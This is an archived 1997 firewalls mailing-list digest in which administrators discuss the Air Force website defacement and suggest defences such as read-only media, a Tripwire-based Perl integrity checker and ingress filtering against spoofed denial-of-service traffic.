From firewalls-owner Wed Jan 1 06:13:58 1997
Date: Wed, 1 Jan 1997 15:02:34 +0100 (MET)
From: Thomas Leitner
To: Chris Plunkett
Cc: firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked
In-Reply-To: <32C9B1A6.2B5F@opensys.com>

On Tue, 31 Dec 1996, Chris Plunkett wrote:

> > Slackware Linux has a useable filesystem on CD-ROM, however the boot
> > partition still has to be HD or Floppy. One thing that puzzles me about
> > bootable media is if you have a bootable CD, how does it install the
> > drivers for itself to read from the CD to actually start reading the boot
> > sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me, but
> > I'm no PC guru...
>
> Or, you could get a SUN and type boot cd.

As far as I know, this does *not* run with a RO filesystem. It rather
creates an in-memory writeable root filesystem (ramdisk in PC-speak).

Tom
--------------------------------------------------------------------------
T o m   L e i t n e r                     Dept. of Communications
                                          Graz University of Technology,
e-mail : tom@finwds01.tu-graz.ac.at       Inffeldgasse 12
Phone  : +43-316-873-7455                 A-8010 Graz / Austria / Europe
Fax    : +43-316-463-697
Home page : http://wiis.tu-graz.ac.at/people/tom.html
PGP public key on : ftp://wiis.tu-graz.ac.at/pgp-keys/tom.asc or send
mail with subject "get Thomas Leitner" to pgp-public-keys@keys.pgp.net
--------------------------------------------------------------------------

From firewalls-owner Wed Jan 1 06:28:51 1997
Date: Wed, 1 Jan 1997 14:59:49 +0100 (MET)
From: Thomas Leitner
To: Paul Ferguson
Cc: Mark Johnson, Gene Lee, Dale Drew, Michael Idengren, Christopher Klaus,
    firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked
In-Reply-To: <3.0.32.19961231180249.006b8f24@lint.cisco.com>

On Tue, 31 Dec 1996, Paul Ferguson wrote:

> Frankly, I think the suggestion of using non-writable media (ie. CD-ROMs)
> is rather unpractical. Most sufficiently interesting web sites contain
> ever-changing & constantly updated information, such as news, various
> daily features, etc.
>
> Not a practical solution.

O.K. If you want to be really secure and still updateable, do this:

1.) Use two mirrored disks. One is mounted read-only, one is mounted
    read/write. The two disks can contain not only the WEB data but the
    whole operating system as well. As someone already noted before: Linux
    (and I'm sure other Unixes as well) can be set up to run from RO media.

2.) When updates are required: Mount the second mirror disk r/w, do the
    update and reboot from the second mirror disk, which is now mounted
    read-only. If the system is set up properly, the reboot time and thus
    the outage time can be kept quite low.

3.) When the system comes up, mount the first disk RW and apply the updates
    as well to keep the disk contents in sync.

If the outage during the update is unacceptable, what about using two
mirror machines: One standby and RW for updates and one on-line running
RO. After the update, machines could swap their functions immediately.
Sure: This would require some fancy IP address setup.

Tom

From firewalls-owner Wed Jan 1 06:43:54 1997
Date: Wed, 01 Jan 1997 09:35:47 -0500
From: The Unseen
To: Brad Daugherty
Cc: Mark Johnson, Dale Drew, Michael Idengren, Christopher Klaus,
    firewalls@GreatCircle.COM
Subject: Re: WWW Gaffiti Immunity (Off Topic)
In-Reply-To: Your message of "Tue, 31 Dec 1996 14:57:19 PST."
    <3.0.32.19961231145712.00a49df8@lexicon.ins.com>

In message <3.0.32.19961231145712.00a49df8@lexicon.ins.com>, Brad Daugherty
slapped a few random keys to produce:

>>> I don't see how CDROM provides significant advantages on a WEB server
>>> "graffiti" attack.
>
>In order to avoid graffiti try something like this:
>
>1)Write a program that checks the size/date of the WWW directory
>  If it fails have it Kill the WWW server
>  and send email to the admin.
>2)Setup a CRON job to run the program every 15 min.
>
>If a hacker is good enough they will find it, but who would be looking for
>such a random thing?
>
>Just make sure you change the size whenever you make a change to your
>documents.

Or better yet, incorporate tripwire with MD5 file signatures into this
scheme instead of rolling your own. Use perl to scan for particular files
that may have changed, taking guestbooks ("public" growable files) into
account.

Some ideas,

Ian

From firewalls-owner Wed Jan 1 06:58:53 1997
Date: Wed, 01 Jan 1997 16:45:28 +0200
From: Can Baysal
Organization: Bogazici University Computer Center
To: firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked

Thomas Leitner wrote:
>
> ................
> If the outage during the update is unacceptable what about using
> two mirror machines: One standby and RW for updates and one
> on-line running RO. After the update, machines could swap their
> functions immediately. Sure: This would require some fancy IP
> address setup.

Well, assuming that one has enough funds, IBM's HACMP can be installed
(onto IBM systems :). So there should not be a problem while configuring
IP (and this is not the only benefit). IMHO it is not so good for
installations that have so many users (especially if you want to keep
them online while switching) like our 10000+, but very suitable if you
want to back your data servers up (like ftp and http).

Regards;
Can Baysal

> Tom

From firewalls-owner Wed Jan 1 07:14:06 1997
Date: Wed, 1 Jan 1997 10:02:51 -0500 (EST)
From: FaNgYoU2
To: firewalls@GreatCircle.com
Subject: Re: LDAP
In-Reply-To: <199701010454.XAA02712@mail.clark.net>

> >Any of you hot shot vendors ...
> > ... doing any work to include
> >LDAP enterprise directory access in firewalls?
>
> V-one is doing some stuff with LDAP ...
What I had in mind was to try to get an idea of what would be involved in
a migration strategy to move from fragmented directory services on
different platforms to an enterprise directory that included firewalls as
follows:

Banyan Vines   }    LDAP
Novel Netware  }   access                 Packet      Proxy     Choke
Lotus Notes    }--enterprise--|--filtering--fire--filtering--|--Internet
Assorted Unix's}  directory   |   router     wall    router   |
Windows Nt     }              |                               |
                           Packet                         External
                          filtering                       hardened
                           router                         DNS server
                              |
                           Packet
                          filtering--Corporate
                           firewall   Intranet

This is essentially a split DNS to hide the corporate network. The
external DNS would provide minimal DNS information on a skeletonized Unix
box, while the internal LDAP access enterprise directory would provide
directory information for everything.

From firewalls-owner Wed Jan 1 10:46:45 1997
Date: Wed, 1 Jan 1997 13:37:00 -0500 (EST)
From: Michael Idengren
To: Paul Ferguson
Cc: Mark Johnson, firewalls@GreatCircle.COM
Subject: Re: Denial of service (was Re: Air Force Web Site Hacked)
In-Reply-To: <3.0.32.19961231222828.006b99dc@lint.cisco.com>

> the world, but a simple-minded denial-of-service attack makes it
> almost an effort in futility if connectivity is your lifeblood.

Speaking of denial-of-service attacks, how would one go about tracing
packets with a false IP header?

The dilemma here is that we have got our router configured properly so
that it doesn't let any packets leave our network with false headers. But
there's a whole slew of people out there with routers who either don't
care or don't know how to filter bad outgoing packets. This presents a
big problem for us if someone decides to execute a denial of service on
us, or even do a simple IP spoof in a hacking attempt so we can't trace
them.

Any Suggestions?

Mike Idengren                    | MEISTER
---------------------------------+----------------------------------
Center for Information Technology| Alachua Free-Net IRC Administrator
Stetson University               | WorldWide Free-Net IRC Network Coordinator

From firewalls-owner Wed Jan 1 10:59:01 1997
Date: Wed, 1 Jan 1997 13:43:01 -0500 (EST)
From: Michael Idengren
To: Norm Laudermilch
Cc: firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked

> I do think read-only media is an interesting idea, by the way :) Dale is
> right though, there are still vulnerabilities. Personally, I like the idea
> of marking the files immutable myself. This way, even root can't change the
> content unless the machine is brought down into single-user mode. Not sure
> how many other operating systems support this other than (the great) BSDI
> though.

I just have a couple of points to bring up on this thread:

1. My comment was partially meant as a joke; it's horribly impractical
for ISPs and Universities and such to require operator intervention
every time a webpage needs to be updated. Such a level of paranoia
*might* only be appropriate for government agencies and authoritative
advanced research sites.

2. With regards to marking files immutable: If I really wanted to secure
a file, I wouldn't do it with software security. No way, no how, absolutely
not - this is the whole point; hardware-level security is the entire point
behind R/O media. I myself would only feel comfortable with jumpering the
hard drive as read-only or mounting a CD-ROM if I ever had to go to such a
level of paranoia.

Mike Idengren

From firewalls-owner Wed Jan 1 11:10:50 1997
Date: Wed, 01 Jan 1997 13:36:59 -0500
From: Paul Ferguson
To: Firewalls Mailing List
Subject: Edupage excerpt

FYI.

- paul

[snip]
>Date: Tue, 31 Dec 1996 15:29:42 -0500 (EST)
>From: Edupage Editors
>Subject: Edupage, 31 December 1996
[snip]
>
>AIR FORCE WEB PAGE HACKED INTO BY VANDALS
>The U.S. Air Force's home page on the World Wide Web < http://www.af.mil >
>was broken into Monday afternoon and replaced with a pornographic image,
>obscenities, and anti-government tirades. Identifying himself only as a
>23-year-old San Diego "business man," the individual who claimed
>responsibility for the invasion told a reporter by telephone: "This was a
>complete server takeover. We literally could have dismantled all the
>electronic information, including e-mail." The man said that he and the
>individuals who participated with him in the vandalism "didn't do any
>damage," and claimed that, "We did it simply to show them you've got to
>upgrade security. The security is simply pathetic on government systems,
>and it's not stopping anyone. One of the people involved in the actual
>break-in was only 15. A foreign government could go through that security
>in a few minutes." He gave himself only 50-50 odds of not being caught, and
>predicted: "The government is going to treat this very, very seriously.
>The illegality of this is extreme." The Air Force Office of Special
>Investigations and the Federal Bureau of Investigations are investigating
>the break-in. (New York Times 31 Dec 96 A9)
>
[snip]

--
Paul Ferguson
Consulting Engineering
Herndon, Virginia USA
tel: +1.703.397.5938
e-mail: pferguso@cisco.com
cisco Systems

From firewalls-owner Wed Jan 1 11:14:27 1997
Date: Wed, 01 Jan 1997 14:03:03 -0500
From: The Unseen
To: firewalls@GreatCircle.COM
Cc: Brad Daugherty, Mark Johnson, Dale Drew, Michael Idengren, Christopher Klaus
Subject: Re: WWW Gaffiti Immunity (Off Topic)
In-Reply-To: Your message of "Wed, 01 Jan 1997 09:35:47 EST."
    <199701011435.JAA01074@sparc.south-border.com>

In message <199701011435.JAA01074@sparc.south-border.com>, The Unseen
slapped a few random keys to produce:

>In message <3.0.32.19961231145712.00a49df8@lexicon.ins.com>,
>Brad Daugherty slapped a few random keys to produce:
>>>> I don't see how CDROM provides significant advantages on a WEB server
>>>> "graffiti" attack.
>>
>>In order to avoid graffiti try something like this:
>>
>>1)Write a program that checks the size/date of the WWW directory
>>  If it fails have it Kill the WWW server
>>  and send email to the admin.
>>2)Setup a CRON job to run the program every 15 min.
>>
>>If a hacker is good enough they will find it, but who would be looking
>>for such a random thing?
>>
>>Just make sure you change the size whenever you make a change to your
>>documents.
>
>Or better yet, incorporate tripwire with MD5 file signatures into this
>scheme instead of rolling your own. Use perl to scan for particular files
>that may have changed, taking guestbooks ("public" growable files) into
>account.
>
>Ian

Unusual for me to answer my own E-mail... 8-)

Here's my donation... (no flames please)

Please keep in mind that I just created this off the top of my head.
You are more than welcome to alter/tailor to your needs...

Ian

-------
#!/usr/local/bin/perl
#
# The purpose of this script is to help secure our WWW files
# from graffiti. We are going to use tripwire to help us keep
# track of file signatures and alert us when there are major
# inconsistencies that may result from someone trying to hack
# our site.
#
# Ideal config consists of a WWW server mounting via NFS the
# document tree. This script is intended to be run on the
# NFS server.
#
# Feel free to distribute and/or alter this script as needed.
# But be kind and email me the changes... ian@south-border.com

package WWWcheck;

$Alert=0;
@SendData=();

# Specify the email address of the admin you want information
# mailed to.
$AdminUser="securityuser";

# Specify the method of emailing.
$SendmailCMD="/usr/lib/sendmail -t";

# The following variables define where tripwire is. Specify
# the correct database and config files to be given to tripwire
# as options. Tripwire will run in quiet mode to eliminate
# pass babble.
$TripCMD="/place/to/bin/tripwire";
$TripDatabase="/place/to/tripwire/www.database";
$TripConfigFile="/place/to/tripwire/WWW.conf";

# If your WWW server mounts its document tree via NFS from
# a hardened server and this script and tripwire run on the
# NFS server, set DoNFSshare to 1. This will unshare the NFS
# directory after a grace period defined below.
$DoNFSshare=1;
$NFSunsharecmd="/usr/sbin/unshare";
$NFSwwwdir="/place/to/real/NFS/server/WWW";

# Change this to 1 to kill the httpd server remotely based on
# the outcome of tripwire. Be sure to review RemoteHttpKill,
# RemoteHost, and RemoteCMD. I like ssh because of the key
# exchange.
$DoRemoteKill=1;

# These are used when DoRemoteKill is set to 1
$RemoteCMD="/opt/PUBsshd/bin/ssh";
$RemoteHost="WWW";
$RemoteHttpKill="/etc/init.d/httpd stop";

# This defines how long to wait gracefully before proceeding
# with killing the httpd server and NFS server.
$SleepTime="sleep 3600";

#<----you do not need to change anything below here--->

# Issue tripwire command with options. Compile a list of
# changes that have occurred from the last update of the
# tripwire database. Save these modifications to be sent
# as a notification to the admin.
sub BuildTripDatabase {
  open(Tripdata,"$TripCMD -d $TripDatabase -c $TripConfigFile -q|")
    or die "cannot run $TripCMD: $!";
  while(<Tripdata>) {
    chomp;
    push(@SendData,$_);
  }
  close(Tripdata);
}

# Mail the tripwire output to the admin together with a description
# of the action this script is about to take.
sub AlertAdmin {
  # Tripwire printed nothing, so there is nothing to report.
  if(!@SendData) { return; }
  open(ALERT,"|$SendmailCMD") or die "cannot run $SendmailCMD: $!";
  print ALERT "To: $AdminUser\n";
  print ALERT "Cc:\n";
  print ALERT "Subject: WWW server Document tree\n\n";
  print ALERT "-------\n";
  print ALERT "Has changed since the last tripwire database update. Here\n";
  print ALERT "is a summary of the output from tripwire run at ",
              scalar(localtime), "\n\n\n";
  for(@SendData) { print ALERT "$_\n"; }
  print ALERT "\nThe following actions will be taken...\n\n";
  if($DoNFSshare == 1 && $DoRemoteKill == 1) {
    print ALERT "Your WWW server mounts its document tree via NFS from\n";
    print ALERT "this server and you have elected to kill the remote httpd\n";
    print ALERT "daemon running on the WWW server. The following command will\n";
    print ALERT "be issued:\n\n";
    print ALERT "$SleepTime ; $NFSunsharecmd $NFSwwwdir ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'\n\n";
    close(ALERT);
    return;
  }
  if($DoNFSshare == 1) {
    # print STDERR `$SleepTime ; $NFSunsharecmd $NFSwwwdir 2>&1 &`;
    print ALERT "Your WWW server is mounting its document tree via an NFS\n";
    print ALERT "server which is this host according to variables set. The\n";
    print ALERT "following command will be issued:\n\n";
    print ALERT "$SleepTime ; $NFSunsharecmd $NFSwwwdir\n\n";
  }
  if($DoRemoteKill == 1) {
    # print STDERR `$RemoteCMD $RemoteHost '($SleepTime ; $RemoteHttpKill) &'`;
    print ALERT "According to our options you have elected to disable httpd\n";
    print ALERT "service on the WWW server. The following command will be\n";
    print ALERT "issued:\n\n";
    print ALERT "$RemoteCMD $RemoteHost '($SleepTime ; $RemoteHttpKill)'\n\n";
  }
  if($DoNFSshare == 0 && $DoRemoteKill == 0) {
    print ALERT "Although we have detected differences that may indicate an\n";
    print ALERT "attack, options set tell us that we are to take no action\n";
    print ALERT "in response. YOU MUST CHECK to see if this is really the\n";
    print ALERT "intended reaction to the tripwire output!\n\n";
  }
  close(ALERT);
}

# Wait out the grace period, then unshare the document tree and/or
# stop the remote httpd according to the options above.
sub PerformKill {
  if($DoNFSshare == 1 && $DoRemoteKill == 1) {
    print STDERR `$SleepTime ; $NFSunsharecmd $NFSwwwdir ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'`;
    return;
  }
  if($DoNFSshare == 1) {
    print STDERR `($SleepTime ; $NFSunsharecmd $NFSwwwdir)`;
  }
  if($DoRemoteKill == 1) {
    print STDERR `$SleepTime ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'`;
  }
}

sub main {
  &BuildTripDatabase();
  &AlertAdmin();
  # Only take action when tripwire actually reported differences;
  # otherwise every cron run would unshare the tree and stop httpd.
  &PerformKill() if @SendData;
}

package main;
WWWcheck::main();

From firewalls-owner Wed Jan 1 11:43:57 1997
Date: Wed, 01 Jan 1997 14:30:00 -0500
From: Paul Ferguson
To: Michael Idengren
Cc: Daniel Senie, firewalls@GreatCircle.COM
Subject: Re: Denial of service (was Re: Air Force Web Site Hacked)

At 01:37 PM 1/1/97 -0500, Michael Idengren wrote:
>
>Speaking of denial-of-service attacks, how would one go about tracing
>packets with a false IP header?
>

I assume that you mean spoofed source addresses here when you mention
'false IP headers'. This is a tough problem, and being on the receiving
end of this, there's really not much you can do at this point.
I also assume that what you refer to below as 'we have got our router
configured properly so that it doesn't let any packets leave our network
with false headers' is traffic filtering on ingress to ensure that only
traffic originating from valid downstream prefixes (ones which you are
advertising upstream) is allowed to traverse the intermediate next hop
(your router), as described in draft-ferguson-ingress-filtering-01.txt.

My coauthor, Daniel Senie [Proteon], and I are going to be submitting an
update to this draft (and perhaps subsequent updates) so that we can get
this moving for publication as an Informational RFC. We're still waiting
to incorporate some additional text & comments into the document on how
it breaks certain technologies (such as mobile IP).

As an aside, there are several discussions surrounding the use of bogus
source addresses in any denial-of-service attack. One such discussion
involves what type of DoS attack we're talking about here; TCP SYN or UDP
flooding. In the case of TCP SYN attacks, one might argue that if the
source address, whether bogus or not, does not exist in the routing table,
then completion of the three-way handshake should not be negotiated by
the receiver. This would appear to be a simple defense.

A more insidious attack method (also mentioned in the draft), however, is
one in which a bogus source address is used by the attacker, but which is
actually a valid, routable, reachable prefix in the routing table, but
which actually belongs to another end-system. The end result is an
exercise for the reader. Any TCP SYN attack which uses reachable prefixes,
and are bogus source addresses of the true originator, is a hard problem
to solve.

There are several devices which have been recently introduced which proxy
the SYN/ACK between originator & destination host which do not attempt to
complete the three-way handshake after 'x' number of SYN's, however, I
won't mention them by name in this forum. There will probably be
additional features such as this introduced in the near future. Also,
there are several OS vendors which have enhanced the way their particular
operating system handles this type of attack by increasing the
appropriate queue depths & decreasing the appropriate timer values. I
won't reference them either.

In any event (and back to the original question), tracing an attack back
to the true originator is tough, and requires the assistance of network
administrators within each administrative domain the attack traverses on
an autonomous system hop-by-hop basis. If you can trace the attack on a
hop-by-hop basis, gleaning previous hop information, the attacker can be
traced to its true source. In an ideal world, one might expect the various
Internet service providers to cooperate in tracking down the perpetrator
of such an attack; in the Real World (tm), sometimes the amount of
cooperation leaves a lot to be desired. This is not to say, however, that
it cannot be done; in fact, it was successfully done just recently to
track down the perpetrator of such an attack. Prosecuting them is another
issue entirely. ;-)

So, what can you do? Log, log, log. And more logging. And get to know the
security administrator upstream from you.

- paul

>The dilemma here is that we have got our router configured properly so
>that it doesn't let any packets leave our network with false headers. But
>there's a whole slew of people out there with routers who either don't
>care or don't know how to filter bad outgoing packets. This presents a
>big problem for us if someone decides to execute a denial of service on
>us, or even do a simple IP spoof in a hacking attempt so we can't trace
>them.
>
>Any Suggestions?
>

--
Paul Ferguson
Consulting Engineering
Herndon, Virginia USA
tel: +1.703.397.5938
e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jan 1 12:02:52 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA06158 for firewalls-outgoing; Wed, 1 Jan 1997 11:55:32 -0800 (PST) Received: from deere-bh.dx.deere.com (deere-bh.dx.deere.com [207.122.201.66]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA06132 for ; Wed, 1 Jan 1997 11:55:21 -0800 (PST) Received: (from uucp@localhost) by deere-bh.dx.deere.com (8.6.12/8.6.11) id NAA10695; Wed, 1 Jan 1997 13:55:01 -0600 Received: from deere.dx.deere.com by deere-bh.dx.deere.com via smap (V1.3) id sma010677; Wed Jan 1 13:54:57 1997 Received: from 90.deere.com (dts.90.deere.com) by deere.dx.deere.com (4.1/SMI-4.0) id AA27398; Wed, 1 Jan 97 13:54:15 CST Received: from bc17684.deere.com by 90.deere.com (SMI-8.6/SMI-SVR4) id NAA23887; Wed, 1 Jan 1997 13:52:19 -0600 Message-Id: <32CAB321.2EBC@90.deere.com> Date: Wed, 01 Jan 1997 12:55:29 -0600 From: Bertrum Carroll Organization: Deere & Company X-Mailer: Mozilla 2.01Gold (Win95; I) Mime-Version: 1.0 To: Brad Daugherty Cc: Mark Johnson , Dale Drew , Michael Idengren , Christopher Klaus , firewalls@GreatCircle.COM Subject: Re: WWW Gaffiti Immunity (Off Topic) References: <3.0.32.19961231145712.00a49df8@lexicon.ins.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brad, I agree with you, but it looks like you just described "TripWire"? What OS & Webserver does the Airforce use? Brad Daugherty wrote: > > >> I don't see how CDROM provides significant advantages on a WEB server > >> "graffiti" attack. > > In order to avoid graffiti try something like this: > > 1)Write a program that checks the size/date of the WWW directory > If it fails have it Kill the WWW server > and send email to the admin. > 2)Setup a CRON job to run the program every 15 min. 
>
> If a hacker is good enough they will find it, but who would be looking for such a random thing?
>
> Just make sure you change the size whenever you make a change to your documents.
>
> As for CD-ROM WWW sites, I believe the term "Link-rot" comes to mind.
>
> Good Luck,
> Brad
>
> Providing The Power Of Operable Networks
> Brad Daugherty - Associate Network Systems Engineer
> PHONE:(630)942-5770  PAGE:(800)467-1467  FAX:(630)545-0068
> Lifetime:

From firewalls-owner Wed Jan 1 12:29:17 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA08160 for firewalls-outgoing; Wed, 1 Jan 1997 12:19:24 -0800 (PST)
Received: from heather.greatbasin.com (heather.greatbasin.com [140.174.194.41]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA08153 for ; Wed, 1 Jan 1997 12:19:17 -0800 (PST)
Received: from marks (hercules.reno.nv.us [204.94.161.224]) by heather.greatbasin.com (8.8.4/8.7.3) with SMTP id MAA26827; Wed, 1 Jan 1997 12:18:42 -0800 (PST)
Message-ID: <32CAC80A.562C@hercules.reno.nv.us>
Date: Wed, 01 Jan 1997 12:24:42 -0800
From: Mark Johnson
X-Mailer: Mozilla 3.0 (WinNT; I)
MIME-Version: 1.0
To: Michael Idengren
CC: Norm Laudermilch, firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Michael Idengren wrote:
> 1. My comment was partially meant as a joke, it's horribly impractical
> for ISP's and Universities and such to require operator intervention
> every time a webpage needs to be updated. Such a level of paranoia
> *might* only be appropriate for government agencies and authoritative
> advanced research sites.
>
> 2. With regards to marking files immutable: If I really wanted to secure
> a file, I wouldn't do it with software security. No way no how absolutely
> not - this is the whole point, hardware-level security is the entire point
> behind R/O media. I myself would only feel comfortable with jumpering the
> hard drive as read-only or mounting a CD-ROM if I ever had to go to such a
> level of paranoia.
>
> Mike Idengren                    | MEISTER
> ---------------------------------+----------------------------------
> Center for Information Technology| Alachua Free-Net IRC Administrator
> Stetson University               | WorldWide Free-Net IRC Network Coordinator
>

I agree that CDROM may not be the best R/O media. A R/O HardDrive or some other form of media which has the ability to shut off the Write abilities at the hardware level may be a more cost/time effective means.

However, as far as who should be this paranoid, that's a whole other issue. I work for a Medical Institution, and the laws that govern patient confidentiality are a nightmare just to read, much less enforce electronically. Some Medical Institutions are wanting to put patient info on line for patient access. So since I live in Reno, a lot of so-called "mega-stars" may visit the hospital. How much do you think tabloids or whoever would pay to get the clinical data? Just for verbal information, doctors have been offered $80,000 (hearsay) for info on one so-called "mega-star" who was admitted to one of the local hospitals. Same thing would happen if a government official was admitted. This may seem extreme, but obviously it's happening more and more. This type of personal info will become more and more available via the internet. Law Offices may have their clients' info on the Internet for their clients to access. This kind of thing becomes quite dangerous for the institutions.

--
Mark Johnson
Network Project Manager
St. Mary's Regional Med Ctr
mark@hercules.reno.nv.us

From firewalls-owner Wed Jan 1 12:43:55 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA09193 for firewalls-outgoing; Wed, 1 Jan 1997 12:34:56 -0800 (PST)
Received: from pagesz.net (nina.pagesz.net [208.194.157.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA09176 for ; Wed, 1 Jan 1997 12:34:44 -0800 (PST)
Received: from jtruitt.pagesz.net (henryIV-82.pagesz.net [208.194.157.82]) by pagesz.net (8.8.2/8.7.3) with SMTP id PAA26231; Wed, 1 Jan 1997 15:34:00 -0500
Message-Id: <199701012034.PAA26231@pagesz.net>
X-Sender: jtruitt@mailhost.pagesz.net
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 01 Jan 1997 15:32:28 -0500
To: Paul Ferguson
From: Jim Truitt
Subject: Re: Denial of service (was Re: Air Force Web Site Hacked)
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

[snip]
>So, what can you do? Log, log, log. And more logging. And get
>to know the security administrator upstream from you.
>
>- paul
[snip]

This is simple, but excellent advice. Users of PGP are always talking about a "web of trust". Perhaps what is needed is a web of trust between security admins.

Just a thought.
Jim Truitt

From firewalls-owner Wed Jan 1 14:03:36 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA14183 for firewalls-outgoing; Wed, 1 Jan 1997 13:48:16 -0800 (PST)
Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA14173 for ; Wed, 1 Jan 1997 13:48:09 -0800 (PST)
Received: from clonvick-pc.cisco.com (c1robo14.cisco.com [171.68.13.14]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id NAA08670; Wed, 1 Jan 1997 13:44:23 -0800 (PST)
Message-Id: <2.2.32.19970101213404.0075d8bc@diablo.cisco.com>
X-Sender: clonvick@diablo.cisco.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 01 Jan 1997 15:34:04 -0600
To: Thomas Leitner, Paul Ferguson
From: Chris Lonvick
Subject: Re: Air Force Web Site Hacked
Cc: Mark Johnson, Gene Lee, Dale Drew, Michael Idengren, "firewalls@GreatCircle.COM"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

There have been several interesting solutions offered here to address the Web server hacking problem. The ones I've seen seem to focus on either making the content static, or on providing secure methods of updating the content from a more secured machine further within the organization. This may work well enough for organizations which are providing the content in a "one way" method: _from_ the organization _to_ the surfers.

However, this doesn't appear to be the model for the future development of the Web/Internet. From marketing blabs and magazine articles, it appears that the largest driver of bi-directional content exchange is going to be electronic transactions. For those companies which aren't planning on doing this anytime soon, I still think that they would want to get "feedback" (aka - demographics research) from people visiting their site.
I, personally, would like to get a transaction record onto a non-volatile media pretty quickly.

I'd say that setting up a Web server on the Internet is not something that you can do, and then just walk away from. You must accept the responsibility of constantly maintaining security on exposed systems like these. I can't offer anything more than to say that the traditional security methods, which have also been mentioned here, are probably the best.

Thanks,
Chris Lonvick
Cisco Systems
Consulting Engineering
Houston, TX, USA
+1-713-778-5663

At 02:59 PM 1/1/97 +0100, Thomas Leitner wrote:
>
>On Tue, 31 Dec 1996, Paul Ferguson wrote:
>
>> Frankly, I think the suggestion of using non-writable media (ie. CD-ROMs)
>> is rather unpractical. Most sufficiently interesting web sites contain
>> ever-changing & constantly updated information, such as news, various
>> daily features, etc.
>>
>> Not a practical solution.
>
>O.K. If you want to be really secure and still updateable, do this:
>
>1.) Use two mirrored disks. One is mounted read-only, one is mounted
>    read/write. The two disks can contain not only the WEB data but
>    the whole operating system as well. As someone already noted
>    before: Linux (and I'm sure other Unixes as well) can be setup
>    to run from an RO media.
>
>2.) When updates are required: Mount the second mirror disk r/w,
>    do the update and reboot from the second mirror disk which is
>    now mounted read-only. If the system is setup properly,
>    the reboot time and thus the outage time can be kept quite low.
>
>3.) When the system comes up, mount the first disk RW and apply
>    the updates as well to keep the disk contents in sync.
>
>If the outage during the update is unacceptable what about using
>two mirror machines: One standby and RW for updates and one
>on-line running RO. After the update, machines could swap their
>functions immediately. Sure: This would require some fancy IP
>address setup.
>
>Tom
>
>--------------------------------------------------------------------------
>T o m   L e i t n e r                       Dept. of Communications
>                                            Graz University of Technology,
>e-mail : tom@finwds01.tu-graz.ac.at         Inffeldgasse 12
>Phone  : +43-316-873-7455                   A-8010 Graz / Austria / Europe
>Fax    : +43-316-463-697
>Home page : http://wiis.tu-graz.ac.at/people/tom.html
>PGP public key on : ftp://wiis.tu-graz.ac.at/pgp-keys/tom.asc or send
>mail with subject "get Thomas Leitner" to pgp-public-keys@keys.pgp.net
>--------------------------------------------------------------------------
>
>
>

From firewalls-owner Wed Jan 1 14:14:18 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA15101 for firewalls-outgoing; Wed, 1 Jan 1997 14:09:30 -0800 (PST)
Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA15084 for ; Wed, 1 Jan 1997 14:09:19 -0800 (PST)
Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id RAA10674; Wed, 1 Jan 1997 17:06:07 -0500
Date: Wed, 1 Jan 1997 17:06:06 -0500 (EST)
From: Todd Graham Lewis
To: Marc Goldburg
cc: Firewalls Mailing List
Subject: Re: packet filtering on PPP interfaces
In-Reply-To: <199612242018.MAA15154@array.arraycomm.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 24 Dec 1996, Marc Goldburg wrote:

> We're planning to use a Sparc 20 with an attached modem pool as a dialup
> ppp server for our telecommuters.

Seems overkill to me; why not a $1k x86 box?

> Is anyone aware of ppp implementation that include packet filtering? Or of
> (nit-based?) packet filtering implementations that could be applied to a
> ppp interface under Solaris 1 (Solaris 1.2 to be exact)?

In a former job, I used Morningstar's PPP implementation for Solaris, and it was very good.
It included ACLs of the type you describe. I'm not sure whether it's still available in general, or for Solaris 1 (ick!) in particular.

__
Todd Graham Lewis                                      Linux!
Core Engineering                          Mindspring Enterprises
tlewis@mindspring.com                     (800) 719 4664, x2804

From firewalls-owner Wed Jan 1 14:28:59 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA14602 for firewalls-outgoing; Wed, 1 Jan 1997 14:01:44 -0800 (PST)
